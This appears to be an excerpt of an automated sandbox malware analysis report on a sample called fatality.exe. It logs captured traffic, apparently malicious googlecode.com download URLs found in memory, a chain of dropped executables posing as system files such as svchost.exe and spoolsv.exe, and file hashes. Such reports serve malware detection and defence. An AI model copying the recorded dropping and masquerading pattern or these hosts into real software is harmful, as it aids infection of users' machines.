64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:19:08 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 
64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:19:09 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 
64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:19:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 
64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gif
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gif/k
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gif4
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gif?
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifK
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifX
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifh3P
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifmes
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifr
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gify
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/googlecode.com/ER_PROFILE_STRING=DefaultHOMEDRIVE
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/googlecode.com/rentVersion
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2939694879.000000000019B000.00000004.00000010.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gif
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gif5
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifF
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifjaqfwbriwnsrwrrkxnqbqxkx
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifm
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifm.exe
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifmes
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/fileseZClXsFjAqFWBriWnSRWrRKXnqBqXkX
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/googlecode.com/
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/googlecode.com/4
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/r
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/soft
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/ultipart/x-mixed-replace
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/=C:
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gif
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gif1
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifB
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifH
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifW
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifl
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifn
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gif~
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/googlecode.com/
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/googlecode.com/Microsoft
                                      Source: containerReview.exe, 0000000D.00000002.1906268968.0000000003BB0000.00000004.00000800.00020000.00000000.sdmp, containerReview.exe, 0000000D.00000002.1906268968.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                      Source: fatality.exe , 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.enigmaprotector.com/
                                      Source: fatality.exe , 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.enigmaprotector.com/openU
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com

                                      System Summary

                                      Source: fatality.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      Source: icsys.icn.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      Source: explorer.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      Source: spoolsv.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      Source: svchost.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      Source: fatality.exe .0.drStatic PE information: section name:
Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_04936863 NtQueryInformationProcess,GetSystemInfo,1_2_04936863
Source: C:\Users\user\Desktop\fatality.exeFile created: C:\Windows\Resources\Themes\icsys.icn.exe
Source: C:\Windows\Resources\Themes\icsys.icn.exeFile created: c:\windows\resources\themes\explorer.exe
Source: C:\Windows\Resources\Themes\explorer.exeFile created: c:\windows\resources\spoolsv.exe
Source: C:\Windows\Resources\spoolsv.exeFile created: c:\windows\resources\svchost.exe
Source: C:\Windows\Resources\svchost.exeFile created: C:\Windows\Resources\Themes\tjcm.cmn
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC8BED934F688E46C294B230B686E2243F.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Resources\Themes\icsys.icn.exeFile deleted: C:\Windows\Resources\Themes\explorer.exe
                                      Source: Joe Sandbox ViewDropped File: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                      Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\FJTVnRjh.log DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: String function: 0095F264 appears 47 times
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: String function: 008FEB78 appears 35 times
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: String function: 008FEC50 appears 53 times
                                      Source: ZKzjsAAu.log.13.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                      Source: SdSCeHzI.log.13.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                      Source: zRrwKlet.log.13.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                      Source: hEPrrPJe.log.13.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                      Source: XWvbHmEw.log.13.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                      Source: FJTVnRjh.log.13.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                      Source: fatality.exe, 00000000.00000003.1707132728.0000000000618000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs fatality.exe
                                      Source: fatality.exe, 00000000.00000003.1707314583.0000000000625000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs fatality.exe
                                      Source: fatality.exe, 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTJprojMain.exe<?xml version="1.0" encoding="UTF-8" standalone="yes"?> vs fatality.exe
                                      Source: fatality.exeBinary or memory string: OriginalFilenameTJprojMain.exe<?xml version="1.0" encoding="UTF-8" standalone="yes"?> vs fatality.exe
                                      Source: fatality.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs fatality.exe
                                      Source: fatality.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      Source: containerReview.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      Source: DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe.13.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
